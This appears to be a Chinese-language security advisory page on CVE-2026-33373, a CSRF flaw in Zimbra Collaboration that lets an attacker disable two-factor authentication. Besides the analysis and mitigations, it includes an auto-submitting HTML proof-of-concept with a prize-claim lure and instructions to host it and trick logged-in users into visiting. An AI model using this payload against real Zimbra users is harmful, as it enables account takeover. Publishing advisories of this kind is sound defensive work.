IPBUF安全漏洞报告
English
CVE-2026-33373 CVSS 8.8 高危

CVE-2026-33373 Zimbra Collaboration CSRF漏洞

披露日期: 2026-03-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33373
漏洞类型
CSRF (跨站请求伪造)
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Zimbra Collaboration (ZCS)

相关标签

CSRFZimbraWeb SecurityAuthentication BypassHigh Severity

漏洞概述

Zimbra Collaboration (ZCS) 10.0和10.1版本存在跨站请求伪造(CSRF)漏洞。在特定账户状态转换(如启用双因素认证或修改密码)时,系统签发的认证令牌缺乏CSRF保护机制。攻击者可诱导已登录用户访问恶意页面,在无需CSRF验证的情况下执行敏感SOAP请求。这可能导致攻击者禁用双因素认证或修改密码,从而完全控制用户账户,造成严重的安全风险。

技术细节

该漏洞根源在于Zimbra Web Client在特定操作(如启用2FA或修改密码)后生成的新认证令牌未强制执行CSRF保护。正常情况下,SOAP请求应验证CSRF Token以防止跨站请求。然而,在该漏洞场景下,当新令牌处于活动状态时,经过身份验证的SOAP请求(特别是触发令牌生成或状态变更的请求)绕过了CSRF验证逻辑。攻击者可构造恶意网页或邮件,诱导已登录的Zimbra用户点击访问。由于浏览器会自动附带Cookie,且服务端未验证Referer或Token,导致攻击者能以受害者身份执行禁用2FA等敏感操作,完全接管账户控制权。

攻击链分析

STEP 1
侦察
攻击者确认目标正在使用易受攻击的Zimbra Collaboration (ZCS) 10.0或10.1版本。
STEP 2
准备
攻击者构造一个恶意的HTML页面,其中包含指向Zimbra SOAP接口的CSRF请求,旨在禁用双因素认证或修改账户状态。
STEP 3
投递
攻击者通过钓鱼邮件或即时消息,诱导已登录Zimbra Web Client的受害者点击链接或访问恶意页面。
STEP 4
利用
受害者的浏览器在访问页面时,自动携带认证Cookie向Zimbra服务器发送SOAP请求。由于存在漏洞,服务器未验证CSRF Token即执行了操作。
STEP 5
后利用
攻击者成功禁用了受害者的2FA或其他安全措施,从而可以绕过强认证机制接管受害者的账户。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-33373: CSRF to Disable Two-Factor Authentication Description: This HTML page attempts to send a crafted SOAP request to disable 2FA. Usage: Host this file and trick an authenticated Zimbra user into visiting it. --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://<target-zimbra-domain>/service/soap/DisableTwoFactorAuthRequest" method="POST"> <input type="hidden" name="" value="" /> <!-- The actual SOAP envelope would be sent in the body or as a parameter depending on endpoint implementation --> <input type="hidden" name="soapenv" value="&lt;soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&lt;soap:Header&gt;&lt;context xmlns=&quot;urn:zimbra&quot;/&gt;&lt;/soap:Header&gt;&lt;soap:Body&gt;&lt;DisableTwoFactorAuthRequest xmlns=&quot;urn:zimbraAccount&quot;/&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;" /> <input type="submit" value="Click to Claim Prize" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

影响范围

Zimbra Collaboration < 10.0.18
Zimbra Collaboration < 10.1.13

防御指南

临时缓解措施
在无法立即升级的情况下,管理员应严格检查Web请求的Referer头,确保请求来源于合法的Zimbra域名。同时,建议用户启用基于Web应用防火墙(WAF)的规则来拦截潜在的CSRF攻击,并暂时避免在不可信网络环境中处理敏感账户操作。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表